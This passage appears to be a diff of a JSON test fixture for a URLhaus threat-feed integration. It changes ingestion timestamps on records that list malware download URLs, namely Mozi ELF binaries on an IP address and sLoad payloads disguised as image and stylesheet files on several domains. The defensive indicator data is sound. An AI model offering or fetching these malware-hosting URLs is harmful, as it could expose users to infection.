UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2478,7 +2478,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024826900Z", + "ingested": "2021-12-14T14:56:15.726405314Z", "original": "{\"id\":\"961497\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961497/\",\"url\":\"http://89.160.20.156:54469/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -2527,7 +2527,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024833900Z", + "ingested": "2021-12-14T14:56:15.726405689Z", "original": "{\"id\":\"961498\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961498/\",\"url\":\"http://89.160.20.156:34547/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2576,7 +2576,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024840800Z", + "ingested": "2021-12-14T14:56:15.726406051Z", "original": "{\"id\":\"961499\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961499/\",\"url\":\"http://89.160.20.156:33932/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2622,7 +2622,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024847800Z", + "ingested": "2021-12-14T14:56:15.726406432Z", "original": "{\"id\":\"961494\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961494/\",\"url\":\"https://univirtek.com/viro/02478080035/blank.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:47 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -2668,7 +2668,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024854700Z", + "ingested": "2021-12-14T14:56:15.726406787Z", "original": "{\"id\":\"961495\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961495/\",\"url\":\"https://univirtek.com/viro/FRRNDR77C25D325O/map.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:47 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2714,7 +2714,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024861500Z", + "ingested": "2021-12-14T14:56:15.726407135Z", "original": "{\"id\":\"961492\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961492/\",\"url\":\"https://ladiesincode.com/ladi/CNNSRG83H04F158R/blank.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:51:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2760,7 +2760,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024868500Z", + "ingested": "2021-12-14T14:56:15.726407505Z", "original": "{\"id\":\"961493\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961493/\",\"url\":\"https://letonguesc.com/leto/02328510512/logo.css\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:51:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -2806,7 +2806,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024875500Z", + "ingested": "2021-12-14T14:56:15.726407964Z", "original": "{\"id\":\"961490\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961490/\",\"url\":\"https://cxminute.com/minu/MLILSN74B21E507L/uk.png\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2852,7 +2852,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024882300Z", + "ingested": "2021-12-14T14:56:15.726408374Z", "original": "{\"id\":\"961491\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961491/\",\"url\":\"https://cxminute.com/minu/12875710159/blank.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2898,7 +2898,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024892900Z", + "ingested": "2021-12-14T14:56:15.726408727Z", "original": "{\"id\":\"961489\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961489/\",\"url\":\"https://cxminute.com/minu/CPNLNZ65M20A200N/maps.gif\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:41 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -2944,7 +2944,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024900100Z", + "ingested": "2021-12-14T14:56:15.726409087Z", "original": "{\"id\":\"961488\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961488/\",\"url\":\"https://belfetproduction.com/bella/DLPCMN64D02D789E/logo.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:51:40 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2990,7 +2990,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024907Z", + "ingested": "2021-12-14T14:56:15.726409465Z", "original": "{\"id\":\"961487\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961487/\",\"url\":\"https://belfetproduction.com/bella/01844510469/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:51:17 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3036,7 +3036,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024913900Z", + "ingested": "2021-12-14T14:56:15.726410161Z", "original": "{\"id\":\"961485\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961485/\",\"url\":\"https://ladiesincode.com/ladi/FRRDNI52M71E522D/logo.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:51:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3082,7 +3082,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024920900Z", + "ingested": "2021-12-14T14:56:15.726410580Z", "original": "{\"id\":\"961486\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961486/\",\"url\":\"https://letonguesc.com/leto/CPPMRC65E04H980Q/it.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:51:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3128,7 +3128,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024927800Z", + "ingested": "2021-12-14T14:56:15.726411029Z", "original": "{\"id\":\"961482\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961482/\",\"url\":\"https://univirtek.com/viro/06389650018/it.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3174,7 +3174,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024934800Z", + "ingested": "2021-12-14T14:56:15.726411489Z", "original": "{\"id\":\"961483\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961483/\",\"url\":\"https://belfetproduction.com/bella/CRSRRT61E15H501H/logo.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:51:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3220,7 +3220,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024941800Z", + "ingested": "2021-12-14T14:56:15.726411858Z", "original": "{\"id\":\"961484\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961484/\",\"url\":\"https://cxminute.com/minu/SMPMSM67P05F205U/it.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3266,7 +3266,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024948900Z", + "ingested": "2021-12-14T14:56:15.726412209Z", "original": "{\"id\":\"961480\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961480/\",\"url\":\"https://univirtek.com/viro/SBNPQL78A24A783E/uk.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3312,7 +3312,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024955700Z", + "ingested": "2021-12-14T14:56:15.726412585Z", "original": "{\"id\":\"961481\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961481/\",\"url\":\"https://cxminute.com/minu/15578761007/maps.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3358,7 +3358,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024962700Z", + "ingested": "2021-12-14T14:56:15.726413055Z", "original": "{\"id\":\"961478\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961478/\",\"url\":\"https://univirtek.com/viro/03079590133/1x1.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3404,7 +3404,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024969500Z", + "ingested": "2021-12-14T14:56:15.726413461Z", "original": "{\"id\":\"961479\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961479/\",\"url\":\"https://ladiesincode.com/ladi/BNCLNR77T56M082U/it.gif\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:51:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3450,7 +3450,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024976500Z", + "ingested": "2021-12-14T14:56:15.726413816Z", "original": "{\"id\":\"961476\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961476/\",\"url\":\"https://cxminute.com/minu/JNKMTJ64B29L424O/uk.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3496,7 +3496,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024983500Z", + "ingested": "2021-12-14T14:56:15.726414175Z", "original": "{\"id\":\"961477\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961477/\",\"url\":\"https://belfetproduction.com/bella/PGNMRA64S22I608Z/en.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3542,7 +3542,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024990300Z", + "ingested": "2021-12-14T14:56:15.726414552Z", "original": "{\"id\":\"961470\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961470/\",\"url\":\"https://cxminute.com/minu/RZKDRD77T23Z229T/logo.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3588,7 +3588,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024997400Z", + "ingested": "2021-12-14T14:56:15.726415139Z", "original": "{\"id\":\"961471\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961471/\",\"url\":\"https://fhivelifestyle.online/nhbrwvdffsgt/adf/maps.jpg\",\"url_status\":\"offline\",\"host\":\"fhivelifestyle.online\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3634,7 +3634,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025004500Z", + "ingested": "2021-12-14T14:56:15.726415507Z", "original": "{\"id\":\"961472\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961472/\",\"url\":\"https://belfetproduction.com/bella/05739900487/1x1.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3680,7 +3680,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025011400Z", + "ingested": "2021-12-14T14:56:15.726415860Z", "original": "{\"id\":\"961473\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961473/\",\"url\":\"https://belfetproduction.com/bella/01767180597/map.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3726,7 +3726,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025018400Z", + "ingested": "2021-12-14T14:56:15.726416307Z", "original": "{\"id\":\"961474\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961474/\",\"url\":\"https://belfetproduction.com/bella/BRNGRG55D21F394K/map.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3772,7 +3772,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025025200Z", + "ingested": "2021-12-14T14:56:15.726416738Z", "original": "{\"id\":\"961475\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961475/\",\"url\":\"https://cxminute.com/minu/DLLTZN67L20L157J/1x1.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3818,7 +3818,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025032300Z", + "ingested": "2021-12-14T14:56:15.726417103Z", "original": "{\"id\":\"961468\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961468/\",\"url\":\"https://cxminute.com/minu/08035410722/logo.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3864,7 +3864,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025039200Z", + "ingested": "2021-12-14T14:56:15.726417462Z", "original": "{\"id\":\"961469\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961469/\",\"url\":\"https://univirtek.com/viro/GRNZEI60M13G346L/en.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:50:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3910,7 +3910,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025046300Z", + "ingested": "2021-12-14T14:56:15.726417820Z", "original": "{\"id\":\"961467\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961467/\",\"url\":\"https://letonguesc.com/leto/03253350239/1x1.png\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:50:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3956,7 +3956,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025053300Z", + "ingested": "2021-12-14T14:56:15.726418275Z", "original": "{\"id\":\"961464\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961464/\",\"url\":\"https://ladiesincode.com/ladi/10582470158/uk.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:50:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4002,7 +4002,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025060200Z", + "ingested": "2021-12-14T14:56:15.726418682Z", "original": "{\"id\":\"961465\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961465/\",\"url\":\"https://ladiesincode.com/ladi/BTTLNZ68A56D325C/map.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:50:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4048,7 +4048,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025067Z", + "ingested": "2021-12-14T14:56:15.726419048Z", "original": "{\"id\":\"961466\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961466/\",\"url\":\"https://letonguesc.com/leto/NNTLRT68P28A717L/en.jpg\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:50:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4094,7 +4094,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025074Z", + "ingested": "2021-12-14T14:56:15.726419407Z", "original": "{\"id\":\"961461\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961461/\",\"url\":\"https://univirtek.com/viro/CTTNDR89A19B149W/maps.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4140,7 +4140,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025080900Z", + "ingested": "2021-12-14T14:56:15.726420065Z", "original": "{\"id\":\"961462\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961462/\",\"url\":\"https://cxminute.com/minu/DRSNTN77B16I197U/logo.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4186,7 +4186,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025087900Z", + "ingested": "2021-12-14T14:56:15.726420467Z", "original": "{\"id\":\"961463\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961463/\",\"url\":\"https://univirtek.com/viro/02941830735/uk.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4232,7 +4232,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025094700Z", + "ingested": "2021-12-14T14:56:15.726420825Z", "original": "{\"id\":\"961458\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961458/\",\"url\":\"https://belfetproduction.com/bella/MNSGCM91A04G240K/it.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4278,7 +4278,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025101600Z", + "ingested": "2021-12-14T14:56:15.726421171Z", "original": "{\"id\":\"961459\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961459/\",\"url\":\"https://ladiesincode.com/ladi/03108100615/it.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4324,7 +4324,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025108400Z", + "ingested": "2021-12-14T14:56:15.726421531Z", "original": "{\"id\":\"961460\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961460/\",\"url\":\"https://cxminute.com/minu/PTACSM56A31F604X/en.png\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4370,7 +4370,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025115300Z", + "ingested": "2021-12-14T14:56:15.726422069Z", "original": "{\"id\":\"961455\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961455/\",\"url\":\"https://univirtek.com/viro/00183050368/en.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:39 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4416,7 +4416,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025156600Z", + "ingested": "2021-12-14T14:56:15.726422425Z", "original": "{\"id\":\"961456\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961456/\",\"url\":\"https://cxminute.com/minu/TSNLSN58H30G912H/uk.gif\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:49:39 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
